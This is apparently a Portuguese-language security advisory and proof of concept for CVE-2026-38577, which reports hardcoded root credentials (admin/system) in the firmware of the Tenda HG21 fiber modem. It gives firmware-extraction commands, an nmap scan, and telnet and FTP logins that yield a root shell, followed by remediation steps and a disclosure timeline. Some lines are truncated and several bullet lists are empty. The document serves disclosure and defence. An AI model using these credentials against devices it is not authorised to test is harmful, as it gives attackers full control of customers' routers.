
Prova de conceito demonstrando credenciais de root codificadas (admin/system) no firmware do modem XPON Tenda HG21, permitindo acesso root não autorizado via telnet e FTP.
| Campo | Valor |
|---|---|
| ID CVE | CVE-2026-38577 |
| Fabricante | Tenda |
| Produto | Tenda HG21 (Modem de Fibra XPON) |
| Versão Afetada | V4.0.0-260302 |
| Chave do Produto | HG21-V1.0-TDE01 |
| Versão de Hardware | V1.0 |
| Data de Compilação do Firmware | 2026-03-02 |
| Arquivo do Firmware | US_HG21re_300002982_en_xpon_2.zip |
| Classe de Vulnerabilidade | CWE-798: Uso de Credenciais Codificadas |
| Descobridor | Anmol Singh Rajput — Pesquisador de Segurança Independente |
| Status de Divulgação | Fabricante ainda não notificado no momento da reserva do CVE — prazo de divulgação responsável de 90 dias aplica-se a partir da data de atribuição do CVE |
A análise do firmware do modem de fibra XPON Tenda HG21 revelou uma conta administrativa codificada embutida na imagem de firmware fornecida. A conta recebe privilégios totais de root (UID 0) e suas credenciais são estáticas entre dispositivos, o que significa que qualquer atacante que consiga acessar um serviço de gerenciamento exposto em uma unidade vulnerável pode se autenticar como root sem precisar conhecer a senha da interface web definida pelo cliente.
/etc/passwd no firmware extraído inclui uma entrada admin com um
hash de senha SHA256crypt que resolve para o valor estático system.0 — ou seja, ela é root, não uma conta de serviço
restrita./etc/shadow presente, então o hash fraco/estático em passwd é a
única barreira que protege a conta./etc/inetd.conf inicia telnetd e ftpd, ambos executados como root, de
modo que a conta codificada é acessível pela rede, não apenas por um
console serial/UART.Um atacante com acesso de rede ao serviço telnet (TCP/23) ou FTP (TCP/21)
de um dispositivo vulnerável pode fazer login como admin usando a senha
estática e obter um shell root / acesso a arquivos em nível de root. Isso
permite, no mínimo:
Vetores CVSS da submissão original (a pontuação do fabricante pode diferir quando publicada):
Este é um PoC baseado em credenciais — ele demonstra que a conta codificada autentica e concede root, não uma exploração de corrupção de memória. Execute apenas contra um dispositivo que você possua ou para o qual tenha autorização explícita de teste.
# Extraia o firmware (binwalk ou ferramenta do fabricante de sua escolha)
binwalk -e US_HG21re_300002982_en_xpon_2.bin
# Localize e inspecione o arquivo passwd
find . -name passwd
cat squashfs-root/etc/passwd
# -> admin:<sha256crypt-hash-de-"system">:0:0:root:/root:/bin/sh
nmap -p 21,23 <ip-do-alvo>
telnet <ip-do-alvo>
# login: admin
# password: system
ftp <ip-do-alvo>
# Name: admin
# Password: system
Um login bem-sucedido em qualquer um dos serviços retorna um shell/sessão FTP
com privilégios de root (id reportará uid=0(root)).
admin/system,
ou no mínimo forçar uma senha aleatória única por dispositivo definida no
primeiro boot (não derivável apenas do número de série).telnetd/ftpd por padrão; exigir aceitação explícita e um
canal autenticado e criptografado (SSH/SFTP) para administração remota.| Data | Evento |
|---|---|
| 2026-03-02 | Versão vulnerável do firmware lançada |
| — | Descoberta durante análise independente do firmware |
| 2026-04-09 | CVE-2026-38577 reservado via MITRE |
| — | Notificação ao fabricante pendente (janela de divulgação de 90 dias a partir da atribuição do CVE) |
Descoberto e reportado por: